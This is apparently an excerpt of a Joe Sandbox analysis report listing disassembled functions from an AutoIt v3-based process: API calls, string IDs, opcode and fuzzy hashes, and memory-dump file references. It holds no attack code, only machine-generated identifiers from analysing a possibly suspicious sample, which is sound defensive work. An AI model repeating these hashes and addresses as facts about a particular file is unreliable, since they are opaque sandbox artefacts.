                                                                                                                                                                                                                                                                              Function 006F35B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 1777 6f35b3-6f3623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006F35E1
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006F3602
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,006F3368,?), ref: 006F3616
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,006F3368,?), ref: 006F361F
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                              • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                              • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                              • Opcode ID: c13ea39f5abb8b53604e812d9d2f9f195960e6a0495b8869d6d7907b50cc31c4
                                                                                                                                                                                                                                                                              • Instruction ID: 1d4d239e787e7ca3ee6ed5d54bf81fa1159ead4f0fa3da4fd5b933af6f4e5f59
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c13ea39f5abb8b53604e812d9d2f9f195960e6a0495b8869d6d7907b50cc31c4
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11F0DA716403D47AE73157176C48E372FBDE7C6F50B10802EB904A71A1D66D1C52DBB8
                                                                                                                                                                                                                                                                              Function 006F61A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00735287
                                                                                                                                                                                                                                                                                • Part of subcall function 006F8577: _wcslen.LIBCMT ref: 006F858A
                                                                                                                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 006F6299
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                              • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                              • API String ID: 2289894680-4094128768
                                                                                                                                                                                                                                                                              • Opcode ID: 9eadd210b7599835dcf5a4274b90f2e3db6c6064927f523e9bbd8ba41b66855b
                                                                                                                                                                                                                                                                              • Instruction ID: 6bdd1f4ee1e29618db209ec8d60e89ee022b7e380fa4d891ade872a514e75fd5
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9eadd210b7599835dcf5a4274b90f2e3db6c6064927f523e9bbd8ba41b66855b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B41D871408308AED750EB20DC45EEF77EDAF44310F10462EFA95921A2EF789A49C79A
                                                                                                                                                                                                                                                                              Function 00728A2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 1829 728a2e-728a42 call 725737 1832 728a44-728a46 1829->1832 1833 728a48-728a50 1829->1833 1834 728a96-728ab6 call 7256a6 1832->1834 1835 728a52-728a59 1833->1835 1836 728a5b-728a5e 1833->1836 1845 728ac4 1834->1845 1846 728ab8-728ac2 call 71f613 1834->1846 1835->1836 1838 728a66-728a7a call 725737 * 2 1835->1838 1839 728a60-728a64 1836->1839 1840 728a7c-728a8c call 725737 CloseHandle 1836->1840 1838->1832 1838->1840 1839->1838 1839->1840 1840->1832 1848 728a8e-728a94 GetLastError 1840->1848 1850 728ac6-728ac9 1845->1850 1846->1850 1848->1834
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,OVs,0072894C,?,007B9CE8,0000000C,007289AB,?,OVs,?,0073564F), ref: 00728A84
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00728A8E
                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00728AB9
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                              • String ID: OVs
                                                                                                                                                                                                                                                                              • API String ID: 2583163307-2708130235
                                                                                                                                                                                                                                                                              • Opcode ID: 2bcfdf6080abaa79b07cd65931d756953a28ecc38a950101f804e2fa113be372
                                                                                                                                                                                                                                                                              • Instruction ID: c6b45bb451bf35c5275bc864083dea6b3d4eea5c22c5542d2e68eb8808ec3635
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2bcfdf6080abaa79b07cd65931d756953a28ecc38a950101f804e2fa113be372
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD014E32607570AAD6646274BC49B7E67654F82734F39C21EF8148B2D3DF7E8D804292
                                                                                                                                                                                                                                                                              Function 006F58CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,006F58BE,SwapMouseButtons,00000004,?), ref: 006F58EF
                                                                                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,006F58BE,SwapMouseButtons,00000004,?), ref: 006F5910
                                                                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,006F58BE,SwapMouseButtons,00000004,?), ref: 006F5932
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                              • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                              • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                              • Opcode ID: c401431bdf85aa224c2400611052732cd325672188e0f9f2d05fbe936248d7e9
                                                                                                                                                                                                                                                                              • Instruction ID: e7aa7a9ffac7ecd57a87c53b4780e50cdc3ad4b0748ec9574f0ca75121874e17
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c401431bdf85aa224c2400611052732cd325672188e0f9f2d05fbe936248d7e9
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3115775610658FFDB258F64CC81EFEBBBDEF00760B108469EA06E7210E2719E419BA4
                                                                                                                                                                                                                                                                              Function 00702B20 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 531COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00703006
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                              • String ID: CALL$bnu
                                                                                                                                                                                                                                                                              • API String ID: 1385522511-2059927368
                                                                                                                                                                                                                                                                              • Opcode ID: 6ec9e68d1c25a5eec24ace0509bbc4f1b5f426881c609594b565abfd13f2e2e5
                                                                                                                                                                                                                                                                              • Instruction ID: 740a41fc101012c959ef5927b89ff54fe9068fce3d6846a243cc162d4becfe03
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ec9e68d1c25a5eec24ace0509bbc4f1b5f426881c609594b565abfd13f2e2e5
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99229E71608201DFC714DF14C488A2ABBF5BF88314F148A5DF4968B3A2D779ED82CB92
                                                                                                                                                                                                                                                                              Function 006F3A95 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 0073413B
                                                                                                                                                                                                                                                                                • Part of subcall function 006F5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006F55D1,?,?,00734B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 006F5871
                                                                                                                                                                                                                                                                                • Part of subcall function 006F3A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 006F3A76
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                              • String ID: X$`u{
                                                                                                                                                                                                                                                                              • API String ID: 779396738-1012507993
                                                                                                                                                                                                                                                                              • Opcode ID: ceee3d990836c781723ab32e62a49a19bbff812a465b0519d5528bc40f6dc26b
                                                                                                                                                                                                                                                                              • Instruction ID: 153c53e591d6b4b4882237c16736866101cdea5315481986fe63e0b45b9f3ccb
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ceee3d990836c781723ab32e62a49a19bbff812a465b0519d5528bc40f6dc26b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F21C371A0025C9BDB45DF98C805BEE7BF9AF49300F008059E645B7382DBF89A898F65
                                                                                                                                                                                                                                                                              Function 0071014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 007109D8
                                                                                                                                                                                                                                                                                • Part of subcall function 00713614: RaiseException.KERNEL32(?,?,?,007109FA,?,00000000,?,?,?,?,?,?,007109FA,00000000,007B9758,00000000), ref: 00713674
                                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 007109F5
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                              • String ID: Unknown exception
                                                                                                                                                                                                                                                                              • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                              • Opcode ID: e6b724aa6fe4beea7f00e91d0b708aa6e3fdbc5ffd021d1e4b08f7dd7dc691ba
                                                                                                                                                                                                                                                                              • Instruction ID: 40b096c0976677c27643d3cd3a03a26f525caa6a6299e867b2d51d73c4d8fd51
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6b724aa6fe4beea7f00e91d0b708aa6e3fdbc5ffd021d1e4b08f7dd7dc691ba
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CFF0687490020DF78B04BAACEC5A9DE777C5E01350B604161BA24965D2FBBCE6D5C6D0
                                                                                                                                                                                                                                                                              Function 007789B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00778D52
                                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00778D59
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 00778F3A
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 146820519-0
                                                                                                                                                                                                                                                                              • Opcode ID: 0121c4092938238cf08bd8a70ae582b630417464b27b0e8fe8e020880f3f5ef3
                                                                                                                                                                                                                                                                              • Instruction ID: 12b98f377e404f80d871fcddb08ea91ee770f1d2a5848b8962ea14ebb06ccd59
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0121c4092938238cf08bd8a70ae582b630417464b27b0e8fe8e020880f3f5ef3
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92127C71A08301DFCB50DF24C488B2ABBE1FF84354F14895DE9898B292CB75ED45CB92
                                                                                                                                                                                                                                                                              Function 00779AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 306214811-0
                                                                                                                                                                                                                                                                              • Opcode ID: 148cd1704fb3293d6704645f80c86ecee72c0ee009be25b789047a26fe089937
                                                                                                                                                                                                                                                                              • Instruction ID: dd183b5dd376c90f89ef60163bfc7e8845812b1bd2ffd6ba46a831e324e93fb0
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 148cd1704fb3293d6704645f80c86ecee72c0ee009be25b789047a26fe089937
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68A14A31604509EFCF18DF18D5D19A9BBA2FF45354B60C4ADE94A8F2A2DB39ED41CB80
                                                                                                                                                                                                                                                                              Function 0070FCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F61A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 006F6299
                                                                                                                                                                                                                                                                              • KillTimer.USER32(?,00000001,?,?), ref: 0070FD36
                                                                                                                                                                                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0070FD45
                                                                                                                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0074FE33
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                              • Opcode ID: 56b0085df9a885ff2287856fd2d6d7d92de40b30f022642370fc98c95fb5d467
                                                                                                                                                                                                                                                                              • Instruction ID: 33133a154d4b984adc6e26ba14af1f8b16e498cb6751c8ede732528a77e8649f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56b0085df9a885ff2287856fd2d6d7d92de40b30f022642370fc98c95fb5d467
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A131A771A04754AFEB32CF24C855BE7BBECAB02308F1044AED6D997282C37C5A85CB55
                                                                                                                                                                                                                                                                              Function 0072970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,007297BA,FF8BC369,00000000,00000002,00000000), ref: 00729744
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,007297BA,FF8BC369,00000000,00000002,00000000,?,00725ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00716F41), ref: 0072974E
                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00729755
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                              • Opcode ID: 759907552aaea573916ac6c710fbaabbd27630ec0a89fc50b9c9e306bdeca20b
                                                                                                                                                                                                                                                                              • Instruction ID: eb9df8bf9d5e0082b83aa582f7873414b44f19653cce22e75f23c80b6dabfb8c
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 759907552aaea573916ac6c710fbaabbd27630ec0a89fc50b9c9e306bdeca20b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D014C32620528EBCB159F99FC09CAE7B29EF85330F280219F911872D0EA74DD419B90
                                                                                                                                                                                                                                                                              Function 00701990 Relevance: 3.6, APIs: 2, Instructions: 643COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
